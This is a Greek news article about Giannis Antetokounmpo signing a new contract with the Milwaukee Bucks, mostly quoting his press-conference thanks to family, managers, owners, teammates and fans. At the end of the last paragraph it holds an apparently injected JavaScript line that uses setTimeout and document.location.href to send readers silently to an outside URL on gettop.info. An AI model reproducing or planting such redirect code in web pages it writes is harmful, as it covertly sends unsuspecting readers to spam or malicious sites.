Μυθικό συμβόλαιο για Αντετοκούνμπο: Δεν θα σας απογοητεύσω

0
13

 

Αφού υπέγραψε το νέο τετραετές συμβόλαιό του με τους Μιλγούοκι Μπακς που θα του αποφέρει 100 εκατομμύρια δολάρια, ο Γιάννης Αντετοκούνμπο έδωσε συνέντευξη Τύπου όπου ευχαρίστησε την οικογένειά του για όσα έχει κάνει για αυτόν τόνισε πως τα λεφτά δεν πρόκειται να τον αλλάξουν.

«Θέλω να ευχαριστήσω την οικογένειά μου. Δεν υπάρχουν αρκετά λόγια για να ευχαριστήσω τους γονείς μου. Χωρίς αυτούς και τη σκληρή δουλειά που έκαναν στην Ελλάδα τα τελευταία 20 χρόνια δεν θα ήμουν εδώ. Θέλω ακόμα να ευχαριστήσω και τους μάνατζέρ μου, τον Άλεξ Σαράτση και τον Γιώργο Πάνου, για την βοήθεια τους και για το γεγονός πως με ανέχονται όταν γίνομαι απαιτητικός. Θέλω να ευχαριστήσω τους ιδιοκτήτες της ομάδας, ήταν πάντα πολύ καλοί μαζί μου, πίστεψαν στο ταλέντο μου και μου έδωσαν αυτοπεποίθηση. Χαίρομαι που θα είμαι εδώ για άλλα πέντε χρόνια. Δεν μπορώ να ξεχάσω και τους συμπαίκτες μου. Θέλω να τους ευχαριστήσω, κάθε μέρα με κάνουν καλύτερο. Σας ευχαριστώ παιδιά, το εκτιμώ.

Θέλω να ευχαριστήσω φυσικά το τεχνικό επιτελείο. Δεν βλέπετε τη δουλειά που κάνουν καθημερινά για να με βελτιώσουν αλλά είναι πολύ σημαντική. Δεν θα το ξεχάσω. Με εμπιστεύτηκαν, με έκαναν καλύτερο. Ευχαριστώ και τους ανθρώπους της ομάδας. Θέλω να ευχαριστήσω στον Τζον Χάμον. Ήταν ένα μεγάλο ταξίδι. Με είδατε στην Ελλάδα, με πιστέψατε. Ήμουν 18 ετών. Ευχαριστώ για την ευκαιρία που μου δώσατε. Αν δεν μου την δίνατε εσείς, ίσως ήταν αλλιώς. Θα συνεχίσω να δουλεύω σκληρά. Με έχετε εδώ για άλλα πέντε χρόνια, δεν θα σας απογοητεύσω. Ελπίζω μια μέρα οι Μπακς να γίνουν μια ομάδα πρωταθλητισμού. Τέλος, θέλω να ευχαριστήσω και τους οπαδούς της ομάδας. Δίχως αυτούς δεν θα ήταν έτσι τα πράγματα. Ευχαριστώ για την υποστήριξή σας. Σας ευχαριστώ όλους» είπε ο Έλληνας διεθνής.

Όσο για το πόσο θα αλλάξει τη ζωή του αυτό το συμβόλαιο τόνισε: «Αυτό είναι μια ασφάλεια για την οικογένειά μου. Ξέρω πως η οικογένειά μου θα είναι καλά, το ίδιο και τα αδέλφια μου, αλλά δεν θα μας αλλάξει ως οικογένεια». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here